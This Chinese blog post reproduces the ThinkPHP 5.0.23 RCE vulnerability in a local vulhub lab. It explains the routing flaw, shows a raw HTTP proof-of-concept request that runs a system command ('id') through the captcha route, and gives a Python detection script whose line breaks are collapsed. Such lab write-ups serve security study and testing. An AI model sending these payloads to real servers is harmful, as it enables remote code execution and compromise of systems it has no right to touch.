Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)

2024-06-23 20:28

本文主要是介绍Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)

漏洞环境搭建

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。我们拿 5.0.23-rce 漏洞举例,如果我们想要安装 5.0.23-rce 漏洞环境,可以 cd 到 5.0.23-rce ,然后输入以下命令启动靶场环境:

docker-compose up -d

在这里插入图片描述

然后我们在浏览器输入 https://localhost:8081就可以访问靶场环境

在这里插入图片描述

ThinkPHP5.0.23-RCE漏洞原理

ThinkPHP5.0.23-RCE漏洞是一种远程代码执行漏洞,存在于ThinkPHP框架的5.0.23版本及之前的版本中。该漏洞的原理是在TP5的路由解析过程中,由于未对用户输入进行足够的过滤,导致恶意用户可以构造特定的URL请求来执行任意的PHP代码。

具体来说,漏洞的原理如下:

  1. 在TP5中,路由解析过程中会将URL中的参数进行解析,并根据解析结果调用相应的控制器方法。

  2. 在解析URL参数时,TP5通过分析URL中的冒号(:)和斜杠(/)来确定控制器和方法的名称。

  3. 由于未对用户输入进行足够的过滤,恶意用户可以通过在URL中注入特定的代码来构造恶意请求。

  4. 恶意用户可以通过在URL中使用特殊字符(如冒号和斜杠)来改变URL参数的解析结果,从而执行任意的PHP代码。

  5. 当恶意用户构造的恶意请求被TP5解析时,解析结果可能会将恶意代码作为控制器或方法的名称,导致恶意代码被执行。

通过利用这个漏洞,攻击者可以执行任意的PHP代码,包括但不限于删除、修改、上传文件等恶意操作,进而对系统进行攻击或者获取系统敏感信息。

其POC如下所示:
url:/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

ThinkPHP 5.0.23-RCE漏洞POC

接下来我们给出ThinkPHP 5.0.23-RCE漏洞的POC,代码内容如下:

POST /index.php?s=captcha HTTP/1.1
Host: host:8081
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

我们通过BP抓包发送数据,得到相应的回显。

在这里插入图片描述

ThinkPHP 5.0.23-RCE漏洞POC编写

现在我们用python编写检测ThinkPHP 5.0.23-RCE漏洞的代码,内容如下:

#!/usr/bin/env pythonimport requests
from urllib.parse import urljoin
# from bs4 import BeautifulSoupdef thinkphp_5023_rce(url):# url = url+'/index.php?s=captcha'# print(url)# payload = r'_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1'# headers = {#     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',#     'Content-Type': 'application/x-www-form-urlencoded',#   }payload = {'_method':'__construct','filter[]':'phpinfo','method':'get','server[REQUEST_METHOD]':'1'}target = urljoin(url,'/index.php?s=captcha')# print(target)response = requests.post(target,data=payload,verify=False)print(response.text)if 'PHP Version' in response.text:print("漏洞存在")else:print("漏洞不存在")if __name__ == '__main__':url = 'http://localhost:8081'thinkphp_5023_rce(url)           

POC代码详细分析

这段代码是一个用于检测ThinkPHP 5.0.23版本远程代码执行漏洞的脚本。下面是对代码的分析:

  1. 导入requests模块和urllib.parse模块的urljoin函数。
  2. 定义了一个名为thinkphp_5023_rce的函数,接受一个参数url作为目标网站的URL。
  3. 构造了一个payload字典,包含了需要发送的POST请求的参数。
  4. 使用urljoin函数将目标网站的URL与特定的路径拼接成新的URL。
  5. 使用requests.post发送POST请求,将目标URL和payload作为参数,设置verify为False表示不验证SSL证书。
  6. 打印响应的文本内容。
  7. 判断响应的文本内容中是否包含"PHP Version",如果包含则表示漏洞存在,否则表示漏洞不存在。
  8. 在主函数中指定目标网站的URL,并调用thinkphp_5023_rce函数。

该代码是一个简单的脚本,用于检测ThinkPHP 5.0.23版本存在的远程代码执行漏洞。它发送一个POST请求并检查响应的文本内容中是否包含特定的关键字来确定漏洞是否存在。

运行效果图

如下是我们这串代码的实际运行效果图:

在这里插入图片描述

这篇关于Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1088190

相关文章

Python 字符串占位

在Python中,可以使用字符串的格式化方法来实现字符串的占位。常见的方法有百分号操作符 % 以及 str.format() 方法 百分号操作符 % name = "张三"age = 20message = "我叫%s,今年%d岁。" % (name, age)print(message) # 我叫张三,今年20岁。 str.format() 方法 name = "张三"age

Eclipse+ADT与Android Studio开发的区别

下文的EA指Eclipse+ADT,AS就是指Android Studio。 就编写界面布局来说AS可以边开发边预览(所见即所得,以及多个屏幕预览),这个优势比较大。AS运行时占的内存比EA的要小。AS创建项目时要创建gradle项目框架,so,创建项目时AS比较慢。android studio基于gradle构建项目,你无法同时集中管理和维护多个项目的源码,而eclipse ADT可以同时打开

一道经典Python程序样例带你飞速掌握Python的字典和列表

Python中的列表(list)和字典(dict)是两种常用的数据结构,它们在数据组织和存储方面有很大的不同。 列表(List) 列表是Python中的一种有序集合,可以随时添加和删除其中的元素。列表中的元素可以是任何数据类型,包括数字、字符串、其他列表等。列表使用方括号[]表示,元素之间用逗号,分隔。 定义和使用 # 定义一个列表 fruits = ['apple', 'banana

Python应用开发——30天学习Streamlit Python包进行APP的构建(9)

st.area_chart 显示区域图。 这是围绕 st.altair_chart 的语法糖。主要区别在于该命令使用数据自身的列和指数来计算图表的 Altair 规格。因此,在许多 "只需绘制此图 "的情况下,该命令更易于使用,但可定制性较差。 如果 st.area_chart 无法正确猜测数据规格,请尝试使用 st.altair_chart 指定所需的图表。 Function signa

python实现最简单循环神经网络(RNNs)

Recurrent Neural Networks(RNNs) 的模型: 上图中红色部分是输入向量。文本、单词、数据都是输入,在网络里都以向量的形式进行表示。 绿色部分是隐藏向量。是加工处理过程。 蓝色部分是输出向量。 python代码表示如下: rnn = RNN()y = rnn.step(x) # x为输入向量,y为输出向量 RNNs神经网络由神经元组成, python

python 喷泉码

因为要完成毕业设计,毕业设计做的是数据分发与传输的东西。在网络中数据容易丢失,所以我用fountain code做所发送数据包的数据恢复。fountain code属于有限域编码的一部分,有很广泛的应用。 我们日常生活中使用的二维码,就用到foutain code做数据恢复。你遮住二维码的四分之一,用手机的相机也照样能识别。你遮住的四分之一就相当于丢失的数据包。 为了实现并理解foutain

python 点滴学

1 python 里面tuple是无法改变的 tuple = (1,),计算tuple里面只有一个元素,也要加上逗号 2  1 毕业论文改 2 leetcode第一题做出来

Python爬虫-贝壳新房

前言 本文是该专栏的第32篇,后面会持续分享python爬虫干货知识,记得关注。 本文以某房网为例,如下图所示,采集对应城市的新房房源数据。具体实现思路和详细逻辑,笔者将在正文结合完整代码进行详细介绍。接下来,跟着笔者直接往下看正文详细内容。(附带完整代码) 正文 地址:aHR0cHM6Ly93aC5mYW5nLmtlLmNvbS9sb3VwYW4v 目标:采集对应城市的

python 在pycharm下能导入外面的模块,到terminal下就不能导入

项目结构如下,在ic2ctw.py 中导入util,在pycharm下不报错,但是到terminal下运行报错  File "deal_data/ic2ctw.py", line 3, in <module>     import util 解决方案: 暂时方案:在终端下:export PYTHONPATH=/Users/fujingling/PycharmProjects/PSENe

将一维机械振动信号构造为训练集和测试集(Python)

从如下链接中下载轴承数据集。 https://www.sciencedirect.com/science/article/pii/S2352340918314124 import numpy as npimport scipy.io as sioimport matplotlib.pyplot as pltimport statistics as statsimport pandas